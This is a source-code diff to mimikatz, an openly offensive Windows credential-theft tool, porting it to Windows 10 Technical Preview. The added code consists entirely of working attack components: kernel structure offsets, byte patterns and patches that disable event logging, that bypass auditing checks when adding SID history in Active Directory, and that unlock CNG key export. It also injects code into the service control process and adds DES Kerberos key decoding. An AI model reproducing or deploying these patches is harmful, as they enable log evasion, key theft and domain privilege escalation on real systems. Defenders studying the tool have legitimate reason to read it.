Microsoft BlueHat edition

Windows 10 Technical Preview inside, but some kernel parts are missing

inc/globals.h

@@ -73,10 +73,12 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_7		7600
 #define KULL_M_WIN_BUILD_8		9200
 #define KULL_M_WIN_BUILD_BLUE	9600
+#define KULL_M_WIN_BUILD_10		9800
 
 #define KULL_M_WIN_MIN_BUILD_XP		2500
 #define KULL_M_WIN_MIN_BUILD_2K3	3000
 #define KULL_M_WIN_MIN_BUILD_VISTA	6000
 #define KULL_M_WIN_MIN_BUILD_7		7000
 #define KULL_M_WIN_MIN_BUILD_8		8000
-#define KULL_M_WIN_MIN_BUILD_BLUE	9400
+#define KULL_M_WIN_MIN_BUILD_BLUE	9400
+#define KULL_M_WIN_MIN_BUILD_10		9800

mimidrv/globals.h

@@ -34,8 +34,9 @@ typedef enum _KIWI_OS_INDEX {
 	KiwiOsIndex_7		= 4,
 	KiwiOsIndex_8		= 5,
 	KiwiOsIndex_BLUE	= 6,
-
-	KiwiOsIndex_MAX		= 7,
+	KiwiOsIndex_10		= 7,
+
+	KiwiOsIndex_MAX		= 8,
 } KIWI_OS_INDEX, *PKIWI_OS_INDEX;
 
 #ifdef _M_IX86

mimidrv/kkll_m_filters.c

@@ -16,6 +16,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 7	*/	{0x004c, 0x000c, 0x0010, 0x0030},
 /* 8	*/	{0x004c, 0x000c, 0x0010, 0x0030},
 /* BLUE	*/	{0x004c, 0x000c, 0x0010, 0x0030},
+/* 10	*/	{0x004c, 0x000c, 0x0010, 0x0030},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -24,6 +25,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 7	*/	{0x0090, 0x0018, 0x0020, 0x0050},
 /* 8	*/	{0x0090, 0x0018, 0x0020, 0x0050},
 /* BLUE	*/	{0x0090, 0x0018, 0x0020, 0x0050},
+/* 10	*/	{0x0090, 0x0018, 0x0020, 0x0050},
 #endif
 };
 

mimidrv/kkll_m_process.c

@@ -15,6 +15,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 7	*/	{0x00b8, 0x026c, 0x0040},
 /* 8	*/	{0x00b8, 0x00c0, 0x0040, 0x02d4},
 /* BLUE	*/	{0x00b8, 0x00c0, 0x0040, 0x02cc},
+/* 10	*/	{0x00b8, 0x00c0, 0x0040, 0x02d4},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -23,6 +24,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 7	*/	{0x0188, 0x043c, 0x0040},
 /* 8	*/	{0x02e8, 0x02f8, 0x0040, 0x0648},
 /* BLUE	*/	{0x02e8, 0x02f8, 0x0040, 0x0678},
+/* 10	*/	{0x02e8, 0x02f8, 0x0040, 0x0690},
 #endif
 };
 

mimidrv/mimidrv.c

@@ -150,8 +150,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
 
 KIWI_OS_INDEX getWindowsIndex()
 {
-	if(*NtBuildNumber > 9600) // forever blue =)
-		return KiwiOsIndex_BLUE;
+	if(*NtBuildNumber > 9800) // forever blue =)
+		return KiwiOsIndex_10;
 
 	switch(*NtBuildNumber)
 	{
@@ -178,6 +178,10 @@ KIWI_OS_INDEX getWindowsIndex()
 		case 9600:
 			return KiwiOsIndex_BLUE;
 			break;
+		case 9800:
+		case 9841:
+			return KiwiOsIndex_10;
+			break;
 		default:
 			return KiwiOsIndex_UNK;
 	}

mimikatz/mimikatz.c

@@ -41,7 +41,7 @@ int wmain(int argc, wchar_t * argv[])
 		L" ## / \\ ##  /* * *\n"
 		L" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
 		L" '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)\n"
-		L"  '#####'                                     with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));
+		L"  '#####'    Microsoft BlueHat edition!       with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));
 
 	mimikatz_initOrClean(TRUE);
 	for(i = MIMIKATZ_AUTO_COMMAND_START ; (i < argc) && (status != STATUS_FATAL_APP_EXIT) ; i++)

mimikatz/modules/kerberos/kuhl_m_kerberos.c

@@ -617,10 +617,9 @@ NTSTATUS kuhl_m_kerberos_hash(int argc, wchar_t * argv[])
 	RtlInitUnicodeString(&uDomain, szDomain);
 
 	RtlUpcaseUnicodeString(&uDomain, &uDomain, FALSE);
-	RtlDowncaseUnicodeString(&uUsername, &uUsername, FALSE);
-	if(uUsername.Length >= sizeof(wchar_t))
-		if(uUsername.Buffer[0] >= L'a' && uUsername.Buffer[0] <= L'z')
-			uUsername.Buffer[0] -= L'z' - L'Z';
+	//RtlDowncaseUnicodeString(&uUsername, &uUsername, FALSE);
+	//if(uUsername.Length >= sizeof(wchar_t))
+	//	uUsername.Buffer[0] = RtlUpcaseUnicodeChar(uUsername.Buffer[0]);
 
 	uSalt.MaximumLength = uUsername.Length + uDomain.Length + sizeof(wchar_t);
 	if(uSalt.Buffer = (PWSTR) LocalAlloc(LPTR, uSalt.MaximumLength))
@@ -685,6 +684,11 @@ NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[])
 		keyType = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
 		keyLen = AES_256_KEY_LENGTH;
 	}
+	else if(kull_m_string_args_byName(argc, argv, L"des", &szKey, NULL))
+	{
+		keyType = KERB_ETYPE_DES_CBC_MD5;
+		keyLen = 8;
+	}
 
 	if(szKey)
 	{

mimikatz/modules/kuhl_m_crypto.c

@@ -702,9 +702,11 @@ KULL_M_PATCH_GENERIC CngReferences[] = {
 #elif defined _M_IX86
 BYTE PTRN_WNO8_SPCryptExportKey[]			= {0xf6, 0x41, 0x20, 0x02, 0x75};
 BYTE PTRN_WIN8_SPCryptExportKey[]			= {0xf6, 0x47, 0x1c, 0x02, 0x75};
+BYTE PTRN_WI10_SPCryptExportKey[]			= {0xf6, 0x43, 0x1c, 0x02, 0x75};
 KULL_M_PATCH_GENERIC CngReferences[] = {
 	{KULL_M_WIN_BUILD_VISTA,	{sizeof(PTRN_WNO8_SPCryptExportKey),	PTRN_WNO8_SPCryptExportKey},	{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
 	{KULL_M_WIN_BUILD_8,		{sizeof(PTRN_WIN8_SPCryptExportKey),	PTRN_WIN8_SPCryptExportKey},	{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
+	{KULL_M_WIN_BUILD_10,		{sizeof(PTRN_WI10_SPCryptExportKey),	PTRN_WI10_SPCryptExportKey},	{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
 };
 #endif
 NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])

mimikatz/modules/kuhl_m_event.c

@@ -18,21 +18,24 @@ const KUHL_M kuhl_m_event = {
 BYTE PTRN_WNT5_PerformWriteRequest[]			= {0x49, 0x89, 0x5b, 0x10, 0x49, 0x89, 0x73, 0x18};
 BYTE PTRN_WN60_Channel__ActualProcessEvent[]	= {0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0x48, 0x8b, 0xda, 0xe8};
 BYTE PTRN_WIN6_Channel__ActualProcessEvent[]	= {0xff, 0xf7, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8};
-
+BYTE PTRN_WI10_Channel__ActualProcessEvent[]	= {0x48, 0x8b, 0xc4, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x40, 0xc8, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x58, 0x08};
+
 BYTE PATC_WNT6_Channel__ActualProcessEvent[]	= {0xc3};
 BYTE PATC_WNT5_PerformWriteRequest[]			= {0x45, 0x33, 0xed, 0xc3};
 
 KULL_M_PATCH_GENERIC EventReferences[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WNT5_PerformWriteRequest),			PTRN_WNT5_PerformWriteRequest},			{sizeof(PATC_WNT5_PerformWriteRequest),			PATC_WNT5_PerformWriteRequest},			{-10}},
 	{KULL_M_WIN_BUILD_VISTA,	{sizeof(PTRN_WN60_Channel__ActualProcessEvent),	PTRN_WN60_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
 	{KULL_M_WIN_BUILD_7,		{sizeof(PTRN_WIN6_Channel__ActualProcessEvent),	PTRN_WIN6_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
+	{KULL_M_WIN_BUILD_10,		{sizeof(PTRN_WI10_Channel__ActualProcessEvent),	PTRN_WI10_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WNT5_PerformWriteRequest[]			= {0x89, 0x45, 0xe4, 0x8b, 0x7d, 0x08, 0x89, 0x7d};
 BYTE PTRN_WN60_Channel__ActualProcessEvent[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x56, 0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0xe8};
 BYTE PTRN_WN61_Channel__ActualProcessEvent[]	= {0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0xe8};
 BYTE PTRN_WN62_Channel__ActualProcessEvent[]	= {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x75, 0x0c};
 BYTE PTRN_WN63_Channel__ActualProcessEvent[]	= {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0xf9, 0x8b};
+BYTE PTRN_WN64_Channel__ActualProcessEvent[]	= {0x33, 0xc4, 0x89, 0x44, 0x24, 0x10, 0x53, 0x56, 0x57, 0xa1};
 
 BYTE PATC_WNT5_PerformWriteRequest[]			= {0x33, 0xc0, 0xc2, 0x04, 0x00};
 BYTE PATC_WNO8_Channel__ActualProcessEvent[]	= {0xc2, 0x04, 0x00};
@@ -44,6 +47,7 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
 	{KULL_M_WIN_BUILD_7,		{sizeof(PTRN_WN61_Channel__ActualProcessEvent),	PTRN_WN61_Channel__ActualProcessEvent},	{sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
 	{KULL_M_WIN_BUILD_8,		{sizeof(PTRN_WN62_Channel__ActualProcessEvent),	PTRN_WN62_Channel__ActualProcessEvent},	{sizeof(PATC_WIN8_Channel__ActualProcessEvent), PATC_WIN8_Channel__ActualProcessEvent}, {-33}},
 	{KULL_M_WIN_BUILD_BLUE,		{sizeof(PTRN_WN63_Channel__ActualProcessEvent),	PTRN_WN63_Channel__ActualProcessEvent},	{sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-32}},
+	{KULL_M_WIN_BUILD_10,		{sizeof(PTRN_WN64_Channel__ActualProcessEvent),	PTRN_WN64_Channel__ActualProcessEvent},	{sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
 };
 #endif
 

mimikatz/modules/kuhl_m_misc.c

@@ -330,9 +330,18 @@ NTSTATUS kuhl_m_misc_wifi(int argc, wchar_t * argv[])
 BYTE PTRN_JMP[]			= {0xeb};
 BYTE PTRN_6NOP[]		= {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
 
+BYTE PTRN_WN64_0[]		= {0xb8, 0x56, 0x21, 0x00, 0x00, 0x41}; // IsDomainInForest
+BYTE PTRN_WN64_1[]		= {0xfa, 0x05, 0x1a, 0x01, 0xe9}; // VerifyAuditingEnabled
+BYTE PTRN_WN64_2[]		= {0x48, 0x8b, 0xd7, 0x8b, 0x8c, 0x24}; // VerifySrcAuditingEnabledAndGetFlatName
+BYTE PTRN_WN64_3[]		= {0xff, 0xff, 0x4c, 0x8d, 0x8c, 0x24, 0x88, 0x01, 0x00, 0x00}; // ForceAuditOnSrcObj
+BYTE PTRN_WN64_4[]		= {0x49, 0x8b, 0x48, 0x18, 0x48, 0x8b, 0x84, 0x24, 0x00, 0x04, 0x00, 0x00}; // fNullUuid
+BYTE PTRN_WN64_5[]		= {0xc7, 0x44, 0x24, 0x74, 0x59, 0x07, 0x1a, 0x01, 0xe9}; // cmp r12
+BYTE PTRN_WN64_6[]		= {0xa9, 0xff, 0xcd, 0xff, 0xff, 0x0f, 0x85}; // cmp eax
+BYTE PTRN_WN64_7[]		= {0x8b, 0x84, 0x24, 0x6c, 0x01, 0x00, 0x00, 0x3d, 0xe8, 0x03, 0x00, 0x00, 0x73}; // SampSplitNT4SID
+
 BYTE PTRN_WN81_0[]		= {0xb8, 0x56, 0x21, 0x00, 0x00, 0x41}; // IsDomainInForest
 BYTE PTRN_WN81_1[]		= {0xc2, 0x05, 0x1a, 0x01, 0xe9}; // VerifyAuditingEnabled
-BYTE PTRN_WN81_2[]		= {0x48, 0x8b, 0xd7, 0x8b, 0x8c, 0x24, 0xc0, 0x00, 0x00, 0x00}; // VerifySrcAuditingEnabledAndGetFlatName
+BYTE PTRN_WN81_2[]		= {0x48, 0x8b, 0xd7, 0x8b, 0x8c, 0x24/*, 0xc0, 0x00, 0x00, 0x00*/}; // VerifySrcAuditingEnabledAndGetFlatName
 BYTE PTRN_WN81_3[]		= {0xff, 0xff, 0x4c, 0x8d, 0x8c, 0x24, 0x60, 0x01, 0x00, 0x00}; // ForceAuditOnSrcObj
 BYTE PTRN_WN81_4[]		= {0x49, 0x8b, 0x48, 0x18, 0x48, 0x8b, 0x84, 0x24, 0x00, 0x04, 0x00, 0x00}; // fNullUuid
 BYTE PTRN_WN81_5[]		= {0xc7, 0x44, 0x24, 0x74, 0x1c, 0x07, 0x1a, 0x01, 0xe9}; // cmp r12
@@ -348,6 +357,16 @@ BYTE PTRN_W8R2_5[]		= {0xc7, 0x44, 0x24, 0x74, 0xed, 0x06, 0x1a, 0x01, 0x8b}; //
 BYTE PTRN_W8R2_6[]		= {0xa9, 0xff, 0xcd, 0xff, 0xff, 0x0f, 0x85}; // cmp eax
 BYTE PTRN_W8R2_7[]		= {0x44, 0x8b, 0x9c, 0x24, 0x80, 0x01, 0x00, 0x00, 0x41, 0x81, 0xfb, 0xe8, 0x03, 0x00, 0x00, 0x73}; // SampSplitNT4SID
 
+KULL_M_PATCH_MULTIPLE wservprev[] = {
+	{{sizeof(PTRN_WN64_0), PTRN_WN64_0}, {sizeof(PTRN_JMP),  PTRN_JMP},	 -2,},
+	{{sizeof(PTRN_WN64_1), PTRN_WN64_1}, {sizeof(PTRN_JMP),  PTRN_JMP},	-13,},
+	{{sizeof(PTRN_WN64_2), PTRN_WN64_2}, {sizeof(PTRN_6NOP), PTRN_6NOP},-11,},
+	{{sizeof(PTRN_WN64_3), PTRN_WN64_3}, {sizeof(PTRN_6NOP), PTRN_6NOP}, -4,},
+	{{sizeof(PTRN_WN64_4), PTRN_WN64_4}, {sizeof(PTRN_JMP),  PTRN_JMP},	 -2,},
+	{{sizeof(PTRN_WN64_5), PTRN_WN64_5}, {sizeof(PTRN_JMP),  PTRN_JMP},	-16,},
+	{{sizeof(PTRN_WN64_6), PTRN_WN64_6}, {sizeof(PTRN_6NOP), PTRN_6NOP}, 18,},
+	{{sizeof(PTRN_WN64_7), PTRN_WN64_7}, {sizeof(PTRN_JMP),  PTRN_JMP},	 12,},
+};
 KULL_M_PATCH_MULTIPLE w2k12r2[] = {
 	{{sizeof(PTRN_WN81_0), PTRN_WN81_0}, {sizeof(PTRN_JMP),  PTRN_JMP},	 -2,},
 	{{sizeof(PTRN_WN81_1), PTRN_WN81_1}, {sizeof(PTRN_JMP),  PTRN_JMP},	-13,},
@@ -391,11 +410,16 @@ NTSTATUS kuhl_m_misc_addsid(int argc, wchar_t * argv[])
 			pOs = w2k8r2;
 			pOsSz = ARRAYSIZE(w2k8r2);
 		}
-		else if(MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_BLUE)
+		else if((MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_BLUE) && (MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_10))
 		{
 			pOs = w2k12r2;
 			pOsSz = ARRAYSIZE(w2k12r2);
 		}
+		else if(MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10)
+		{
+			pOs = wservprev;
+			pOsSz = ARRAYSIZE(wservprev);
+		}
 
 		if(pOs && pOsSz)
 		{
@@ -490,6 +514,7 @@ NTSTATUS kuhl_m_misc_addsid(int argc, wchar_t * argv[])
 							}
 							CloseHandle(hProcess);
 						}
+						else PRINT_ERROR_AUTO(L"OpenProcess");
 					}
 					err = DsUnBindW(&hDs);
 				}

mimikatz/modules/kuhl_m_service_remote.c

@@ -5,37 +5,50 @@
 */
 #include "kuhl_m_service_remote.h"
 
-PSCSENDCONTROL pScSendControl = NULL;
+PVOID pScSendControl = NULL;
 
 #ifdef _M_X64
 BYTE PTRN_WN61_ScSendControl[]		= {0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x33, 0xc0};
 BYTE PTRN_WIN8_ScSendControl[]		= {0x48, 0x8d, 0x6c, 0x24, 0xf9, 0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x33, 0xc0};
+BYTE PTRN_WI10_ScSendControl[]		= {0x48, 0x8d, 0x6c, 0x24, 0xf9, 0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x33, 0xf6};
 KULL_M_PATCH_GENERIC ScSendControlReferences[] = {
 	{KULL_M_WIN_BUILD_7,		{sizeof(PTRN_WN61_ScSendControl),	PTRN_WN61_ScSendControl},	{0, NULL}, {-26}},
 	{KULL_M_WIN_BUILD_8,		{sizeof(PTRN_WIN8_ScSendControl),	PTRN_WIN8_ScSendControl},	{0, NULL}, {-21}},
+	{KULL_M_WIN_BUILD_10,		{sizeof(PTRN_WI10_ScSendControl),	PTRN_WI10_ScSendControl},	{0, NULL}, {-21}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WN61_ScSendControl[]		= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x94, 0x00, 0x00, 0x00, 0x53};
 BYTE PTRN_WIN8_ScSendControl[]		= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xe4, 0xf8, 0x83, 0xec, 0x7c};
+BYTE PTRN_WI10_ScSendControl[]		= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xe4, 0xf8, 0x83, 0xec, 0x7c, 0x53, 0x56, 0x57, 0x89};
+
 KULL_M_PATCH_GENERIC ScSendControlReferences[] = {
 	{KULL_M_WIN_BUILD_7,		{sizeof(PTRN_WN61_ScSendControl),	PTRN_WN61_ScSendControl},	{0, NULL}, {0}},
 	{KULL_M_WIN_BUILD_8,		{sizeof(PTRN_WIN8_ScSendControl),	PTRN_WIN8_ScSendControl},	{0, NULL}, {0}},
+	{KULL_M_WIN_BUILD_10,		{sizeof(PTRN_WI10_ScSendControl),	PTRN_WI10_ScSendControl},	{0, NULL}, {0}},
 };
 #endif
 
 #pragma optimize("", off)
-DWORD WINAPI kuhl_service_sendcontrol_thread(PREMOTE_LIB_DATA lpParameter)
+DWORD WINAPI kuhl_service_sendcontrol_std_thread(PREMOTE_LIB_DATA lpParameter)
+{
+	lpParameter->output.outputStatus = ((PSCSENDCONTROL_STD) lpParameter->input.inputVoid)((LPCWSTR) lpParameter->input.inputData, 0, 0, 0, lpParameter->input.inputDword, 0, 0, 0, 0, 0, 0, 0, 0, 0);
+	return STATUS_SUCCESS;
+}
+DWORD kuhl_service_sendcontrol_std_thread_end(){return 'svcs';}
+
+DWORD WINAPI kuhl_service_sendcontrol_fast_thread(PREMOTE_LIB_DATA lpParameter)
 {
-	lpParameter->output.outputStatus = ((PSCSENDCONTROL) lpParameter->input.inputVoid)((LPCWSTR) lpParameter->input.inputData, 0, 0, 0, lpParameter->input.inputDword, 0, 0, 0, 0, 0, 0, 0, 0, 0);
+	lpParameter->output.outputStatus = ((PSCSENDCONTROL_FAST) lpParameter->input.inputVoid)((LPCWSTR) lpParameter->input.inputData, 0, 0, 0, lpParameter->input.inputDword, 0, 0, 0, 0, 0, 0, 0, 0, 0);
 	return STATUS_SUCCESS;
 }
-DWORD kuhl_service_sendcontrol_thread_end(){return 'svcc';}
+DWORD kuhl_service_sendcontrol_fast_thread_end(){return 'svcf';}
 #pragma optimize("", on)
 
 BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
 {
 	BOOL status = FALSE;
-	DWORD processId;
+	DWORD processId, szCode;
+	PVOID pCode;
 	HANDLE hProcess;
 	KULL_M_MEMORY_ADDRESS aRemoteFunc;
 	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
@@ -66,7 +79,7 @@ BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
 							{
 								aLocalMemory.address = currentReference->Search.Pattern;
 								if(kull_m_memory_search(&aLocalMemory, currentReference->Search.Length, &sMemory, FALSE))
-									pScSendControl = (PSCSENDCONTROL) ((PBYTE) sMemory.result + currentReference->Offsets.off0);
+									pScSendControl = (PBYTE) sMemory.result + currentReference->Offsets.off0;
 								else PRINT_ERROR_AUTO(L"kull_m_memory_search");
 							}
 							LocalFree(pNtHeaders);
@@ -76,7 +89,18 @@ BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
 
 				if(pScSendControl)
 				{
-					if(kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory, kuhl_service_sendcontrol_thread, (DWORD) ((PBYTE) kuhl_service_sendcontrol_thread_end - (PBYTE) kuhl_service_sendcontrol_thread), NULL, &aRemoteFunc))
+					if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_8)
+					{
+						szCode = (DWORD) ((PBYTE) kuhl_service_sendcontrol_std_thread_end - (PBYTE) kuhl_service_sendcontrol_std_thread);
+						pCode = kuhl_service_sendcontrol_std_thread;
+					}
+					else
+					{
+						szCode = (DWORD) ((PBYTE) kuhl_service_sendcontrol_fast_thread_end - (PBYTE) kuhl_service_sendcontrol_fast_thread);
+						pCode = kuhl_service_sendcontrol_fast_thread;
+					}
+
+					if(kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory, pCode, szCode, NULL, &aRemoteFunc))
 					{
 						if(iData = kull_m_remotelib_CreateInput(pScSendControl, dwControl, (DWORD) (wcslen(ServiceName) + 1) * sizeof(wchar_t), ServiceName))
 						{

mimikatz/modules/kuhl_m_service_remote.h

@@ -8,9 +8,12 @@
 #include "../modules/kull_m_remotelib.h"
 #include "../modules/kull_m_patch.h"
 
-typedef DWORD (WINAPI * PSCSENDCONTROL) (LPCWSTR lpServiceName, PVOID arg1, PVOID arg2, int arg3, DWORD dwControl, DWORD arg4, PVOID arg5, DWORD arg6, PVOID arg7, DWORD arg8, DWORD arg9, PVOID arg10, PVOID arg11, PVOID arg12);
+typedef DWORD ( __stdcall * PSCSENDCONTROL_STD)	(LPCWSTR lpServiceName, PVOID arg1, PVOID arg2, int arg3, DWORD dwControl, DWORD arg4, PVOID arg5, DWORD arg6, PVOID arg7, DWORD arg8, DWORD arg9, PVOID arg10, PVOID arg11, PVOID arg12);
+typedef DWORD (__fastcall * PSCSENDCONTROL_FAST)(LPCWSTR lpServiceName, PVOID arg1, PVOID arg2, int arg3, DWORD dwControl, DWORD arg4, PVOID arg5, DWORD arg6, PVOID arg7, DWORD arg8, DWORD arg9, PVOID arg10, PVOID arg11, PVOID arg12);
 
-DWORD WINAPI kuhl_service_sendcontrol_thread(PREMOTE_LIB_DATA lpParameter);
-DWORD kuhl_service_sendcontrol_thread_end();
+DWORD WINAPI kuhl_service_sendcontrol_std_thread(PREMOTE_LIB_DATA lpParameter);
+DWORD kuhl_service_sendcontrol_std_thread_end();
+DWORD WINAPI kuhl_service_sendcontrol_fast_thread(PREMOTE_LIB_DATA lpParameter);
+DWORD kuhl_service_sendcontrol_fast_thread_end();
 
 BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl);

mimikatz/modules/kuhl_m_standard.c

@@ -16,6 +16,7 @@ const KUHL_M_C kuhl_m_c_standard[] = {
 	{kuhl_m_standard_base64,	L"base64",	L"Switch file output/base64 output"},
 	{kuhl_m_standard_version,	L"version",	L"Display some version informations"},
 	{kuhl_m_standard_cd,		L"cd",		L"Change or display current directory"},
+	{kuhl_m_standard_markruss,	L"markruss",L"Change or display current directory"},
 };
 const KUHL_M kuhl_m_standard = {
 	L"standard",	L"Standard module",	L"Basic commands (does not require module name)",
@@ -126,4 +127,10 @@ NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[])
 		else PRINT_ERROR_AUTO(L"SetCurrentDirectory");
 	}
 	return STATUS_SUCCESS;
+}
+
+NTSTATUS kuhl_m_standard_markruss(int argc, wchar_t * argv[])
+{
+	kprintf(L"Sorry you guys don\'t get it.\n");
+	return STATUS_SUCCESS;
 }

mimikatz/modules/kuhl_m_standard.h

@@ -20,4 +20,5 @@ NTSTATUS kuhl_m_standard_log(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_standard_base64(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[]);
-NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_standard_markruss(int argc, wchar_t * argv[]);